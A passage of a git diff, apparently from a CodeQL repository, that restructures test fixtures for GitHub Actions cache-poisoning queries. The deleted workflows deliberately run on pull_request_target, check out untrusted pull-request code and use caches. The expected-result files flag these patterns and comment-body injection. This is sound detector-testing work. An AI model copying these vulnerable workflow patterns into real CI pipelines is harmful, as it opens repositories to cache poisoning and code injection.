'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }} - runs-on: ubuntu-latest - needs: - - openapi-base - steps: - - name: Upload openapi.json (unstable) to repository server - uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7 - with: - host: "${{ secrets.REPO_HOST }}" - username: "${{ secrets.REPO_USER }}" - key: "${{ secrets.REPO_KEY }}" - source: openapi-head/openapi.json - strip_components: 1 - target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}" diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml deleted file mode 100644 index fa56d074936b..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml +++ /dev/null @@ -1,23 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -permissions: {} - -jobs: - poison: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v2 - with: - distribution: 'zulu' - java-version: '21' - cache: 'gradle' - cache-dependency-path: | - sub-project/*.gradle* - sub-project/**/gradle-wrapper.properties - - run: | - java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml deleted file mode 100644 index 03eb9e99f0f2..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -permissions: - contents: read - -jobs: - poison: - runs-on: ubuntu-latest - permissions: read-all - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v2 - with: - distribution: 'zulu' - java-version: '21' - - run: | - java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml deleted file mode 100644 index b7454d0a0dc1..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -jobs: - poison: - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-go@v2 - with: - go-version-file: 'go.mod' - cache: false - - run: do some go stuff - diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml deleted file mode 100644 index 2fa898982bcd..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml +++ /dev/null @@ -1,18 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -jobs: - poison: - runs-on: ubuntu-latest - permissions: read-all - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-go@v2 - with: - go-version-file: 'go.mod' - cache: true - - run: do some go stuff - diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml deleted file mode 100644 index be83f83cf30b..000000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -jobs: - poison: - runs-on: ubuntu-latest - permissions: read-all - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-go@v2 - with: - go-version-file: 'go.mod' - - run: do some go stuff - diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected deleted file mode 100644 index fdaf0cf25ad1..000000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ /dev/null @@ -1,98 +0,0 @@ -edges -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | -| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | -| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:16:9:20:6 | Uses Step | -| .github/workflows/test4.yml:16:9:20:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | -| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:14:9:18:6 | Uses Step | -| .github/workflows/test5.yml:14:9:18:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | -| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:12:9:15:6 | Uses Step | -| .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | -| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:23:9:26:6 | Uses Step | -| .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | -| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:34:9:37:6 | Uses Step | -| .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | -| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:14:9:19:6 | Uses Step | -| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | -| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:14:9:19:6 | Uses Step | -| .github/workflows/test12.yml:14:9:19:6 | Uses Step | .github/workflows/test12.yml:19:9:20:30 | Run Step | -| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:17:9:21:6 | Uses Step | -| .github/workflows/test13.yml:17:9:21:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | -| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:17:9:21:6 | Uses Step | -| .github/workflows/test14.yml:17:9:21:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | -| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | -| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | -| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:20:9:22:6 | Uses Step | -| .github/workflows/test17.yml:20:9:22:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:19:9:24:6 | Uses Step | -| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | -| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:27:9:30:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:21:9:41:49 | Run Step: check | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:25:7:31:4 | Uses Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | -| .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | -| .github/workflows/test22.yml:13:9:14:6 | Uses Step | .github/workflows/test22.yml:14:9:18:6 | Uses Step | -| .github/workflows/test22.yml:14:9:18:6 | Uses Step | .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test22.yml:25:9:30:6 | Uses Step | -| .github/workflows/test22.yml:25:9:30:6 | Uses Step | .github/workflows/test22.yml:30:9:35:36 | Uses Step | -| .github/workflows/test23.yml:13:9:14:6 | Uses Step | .github/workflows/test23.yml:14:9:18:6 | Uses Step | -| .github/workflows/test23.yml:14:9:18:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | -| .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:30:9:35:36 | Uses Step | -#select -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref deleted file mode 100644 index 2cbd05800e68..000000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref +++ /dev/null @@ -1,2 +0,0 @@ -Security/CWE-349/CachePoisoning.ql - diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected deleted file mode 100644 index e0a5e8fd4b1b..000000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected +++ /dev/null @@ -1,20 +0,0 @@ -edges -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | provenance | | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | provenance | | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | provenance | | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | provenance | | -nodes -| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test10.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | -| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | -| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | -| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | semmle.label | steps.modified_files.outputs.files_added | -| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | semmle.label | steps.modified_files.outputs.files_removed | -subpaths -#select -| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | -| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | -| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | ${{ steps.modified_files.outputs.files_added }} | -| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | ${{ steps.modified_files.outputs.files_removed }} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref deleted file mode 100644 index cd1a90049a64..000000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref +++ /dev/null @@ -1,2 +0,0 @@ -Security/CWE-349/CachePoisoningByCodeInjection.ql - diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected new file mode 100644 index 000000000000..d9f659cbcc38 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -0,0 +1,11 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | provenance | | +nodes +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | +| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref new file mode 100644 index 000000000000..8ac48aad93e0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaCodeInjection.ql + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected new file mode 100644 index 000000000000..8bd69d8f245a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected @@ -0,0 +1,48 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | +| .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | +| .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:22:9:23:21 | Run Step | +| .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:18:9:19:21 | Run Step | +| .github/workflows/direct_cache3.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | +| .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:23:9:24:21 | Run Step | +| .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | +| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache3.yml:13:9:14:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | +| .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | +| .github/workflows/poisonable_step1.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | +| .github/workflows/poisonable_step1.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | +| .github/workflows/poisonable_step1.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | +| .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | 